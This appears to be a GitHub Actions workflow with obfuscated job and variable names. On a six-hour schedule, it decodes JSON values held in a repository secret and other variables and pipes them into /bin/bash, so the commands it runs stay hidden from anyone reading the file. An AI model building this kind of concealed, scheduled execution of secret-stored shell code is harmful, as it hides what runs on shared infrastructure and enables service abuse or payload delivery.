name: guoxiuqing2678
on:
  workflow_dispatch:
  schedule:
    - cron: '4 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: guoxiuqing2678
        env:
          yz41871: ${{ secrets.yz41871 }}
        run: |
          echo $yz41871 | jq -r .lcxph45 | /bin/bash
          echo $jhagx31 | jq -r .iewtg865 | /bin/bash
          echo $bjkac3282 | jq -r .pcg91 | /bin/bash
          echo $scir5955 | jq -r .gxcf31676 | /bin/bash

